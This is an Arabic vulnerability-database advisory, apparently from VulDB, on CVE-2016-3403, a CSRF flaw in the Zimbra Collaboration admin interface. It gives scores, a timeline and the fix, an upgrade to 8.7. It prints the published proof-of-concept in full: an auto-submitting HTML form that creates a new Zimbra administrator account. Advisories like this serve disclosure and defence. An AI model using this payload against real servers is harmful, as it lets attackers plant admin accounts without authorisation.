Synacor Zimbra Collaboration حتى 8.6 Administration Interface تزوير طلبات عبر المواقع
| CVSS الدرجة المؤقتة للميتا | سعر الإكسبلويت الحالي (≈) | درجة اهتمام CTI |
|---|---|---|
| 6.3 | $0-$5k | 0.00 |
الملخص
تم التعرف على ثغرة أمنية في Synacor Zimbra Collaboration حتى 8.6. وقد تم تصنيفها على أنها مشكلة صعبة الحل. الثغرة الأمنية أثرت على دالة غير معروفة من العنصر Administration Interface. تؤدي عملية التلاعب إلى تزوير طلبات عبر المواقع. الثغرة الأمنية هذه تم تسميتهاCVE-2016-3403. يمكن البدأ بالهجوم هذا عن بعد. بالإضافة إلى ذلك، يتوفر استغلال. يُنصح بترقية المكون المتأثر.
التفاصيل
تم التعرف على ثغرة أمنية في Synacor Zimbra Collaboration حتى 8.6. وقد تم تصنيفها على أنها مشكلة صعبة الحل. الثغرة الأمنية أثرت على دالة غير معروفة من العنصر Administration Interface. تؤدي عملية التلاعب إلى تزوير طلبات عبر المواقع. عند استخدام CWE لتحديد المشكلة، سيتم التوجيه إلى CWE-352. تم اكتشاف الثغرة في 11/01/2017. تم إصدار التحذير حول الضعف 11/01/2017 عن طريق Anthony Laou-Hine Tsuei بالتعاون مع Sysdream Labs برقم [CVE-2016-3403] [Zimbra] Multiple CSRF in Administration interface - all versions كـ Mailinglist Post (Full-Disclosure). يمكن قراءة الاستشارة من هنا seclists.org. تم النشر بالتنسيق مع الشركة المالكة.
الثغرة الأمنية هذه تم تسميتهاCVE-2016-3403. تم تعيين CVE في 17/03/2016. يمكن البدأ بالهجوم هذا عن بعد. لا تتوفر معلومات تقنية. معدل انتشار هذه الثغرة أقل من المعدل العام. بالإضافة إلى ذلك، يتوفر استغلال. تم الكشف عن الاستغلال للعامة وقد يتم استخدامه. وقد أشار الاستشاري إلى أن:
Multiple CSRF vulnerabilities have been found in the administration interface of Zimbra, giving possibilities like adding, modifying and removing admin accounts.
إذا تم تحديد إثبات المفهوم، فإنه يُعلن كـ إثبات المفهوم. يمكن تحميل الإكسبلويت من هناseclists.org. تم اعتبار الثغرة استغلال يوم-صفر غير معلن لمدة لا تقل عن 322 يومًا. لكونها ثغرة هجوم فوري متوسط سعرها كان$0-$5k. الكود المستخدم في الاستغلال هو:
<html>
<body>
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171:7071/service/admin/soap/CreateAccountRequest";
method="POST">
<input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope";><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/><session xmlns=""
id="1337"/><format xmlns=""
type="js"/></context></soap:Header><soap:Body><CreateAccountRequest
xmlns="urn:zimbraAdmin"><name xmlns="">itworks () ubuntu fr</name><password
xmlns="">test1234</password><a xmlns=""
n="zimbraAccountStatus">active</a><a xmlns=""
n="displayName">ItWorks</a><a xmlns="" n'
value='"sn">itworks</a><a xmlns=""
n="zimbraIsAdminAccount">TRUE</a></CreateAccountRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
إذا تمت الترقية إلى الإصدار 8.7، يمكن معالجة هذه المشكلة. يُنصح بترقية المكون المتأثر.
إذا كانت قائمة قواعد بيانات المصدر تحتوي على عناصر، فإن الثغرة موثقة أيضًا في قواعد بيانات ثغرات أخرى: SecurityFocus (BID 95383).
منتج
النوع
المجهز
الأسم
النسخة
الرخصة
موقع إلكتروني
- المجهز: https://synacor.com/
CPE 2.3
CPE 2.2
CVSSv4
VulDB متجه: 🔍VulDB الاعتمادية: 🔍
CVSSv3
VulDB الدرجة الأساسية للميتا: 6.6VulDB الدرجة المؤقتة للميتا: 6.4
VulDB الدرجة الأساسية: 4.3
VulDB الدرجة المؤقتة: 3.9
VulDB متجه: 🔍
VulDB الاعتمادية: 🔍
NVD الدرجة الأساسية: 8.8
NVD متجه: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| متجه | التعقيد | توثيق | السرية | الأمانة | التوفر |
|---|---|---|---|---|---|
| افتح | افتح | افتح | افتح | افتح | افتح |
| افتح | افتح | افتح | افتح | افتح | افتح |
| افتح | افتح | افتح | افتح | افتح | افتح |
VulDB الدرجة الأساسية: 🔍
VulDB الدرجة المؤقتة: 🔍
VulDB الاعتمادية: 🔍
NVD الدرجة الأساسية: 🔍
استغلال
الفئة: تزوير طلبات عبر المواقعCWE: CWE-352 / CWE-862 / CWE-863
CAPEC: 🔍
ATT&CK: 🔍
ملموس: لا
محلي: لا
عن بُعد: نعم
التوفر: 🔍
وصول: عام
الحالة: إثبات المفهوم
المؤلف: Anthony Laou-Hine Tsuei
لغة البرمجة: 🔍
تحميل: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
تقدير السعر: 🔍
تقدير السعر الحالي: 🔍
| 0-Day | افتح | افتح | افتح | افتح |
|---|---|---|---|---|
| اليوم | افتح | افتح | افتح | افتح |
استخبارات التهديد
الاهتمام: 🔍الفاعلون النشطون: 🔍
مجموعات APT النشطة: 🔍
إجراءات مضادة
التوصية: ترقيةالحالة: 🔍
زمن الهجوم الفوري: 🔍
وقت تأخير الاستغلال: 🔍
ترقية: Zimbra Collaboration 8.7
الجدول الزمني
24/02/2016 🔍24/02/2016 🔍
17/03/2016 🔍
11/01/2017 🔍
11/01/2017 🔍
11/01/2017 🔍
11/01/2017 🔍
13/01/2017 🔍
17/05/2017 🔍
28/10/2022 🔍
المصادر
المجهز: synacor.comاستشارة: [CVE-2016-3403] [Zimbra] Multiple CSRF in Administration interface - all versions
باحث: Anthony Laou-Hine Tsuei
منظمة: Sysdream Labs
الحالة: مؤكد
تأكيد: 🔍
منسق: 🔍
CVE: CVE-2016-3403 (🔍)
GCVE (CVE): GCVE-0-2016-3403
GCVE (VulDB): GCVE-100-95285
SecurityFocus: 95383 - Zimbra CVE-2016-3403 Multiple Cross Site Request Forgery Vulnerabilities
scip Labs: https://www.scip.ch/en/?labs.20161013
إدخال
تم الإنشاء: 13/01/2017 12:13 PMتم التحديث: 28/10/2022 03:00 PM
التغييرات: 13/01/2017 12:13 PM (76), 03/02/2020 05:44 PM (4), 28/10/2022 03:00 PM (3)
كامل: 🔍
Cache ID: 216::103
If you want to get the best quality for vulnerability data then you always have to consider VulDB.
لا توجد تعليقات بعد اللغات: ar + fa + en.
يرجى تسجيل الدخول حتى تتمكن من التعليق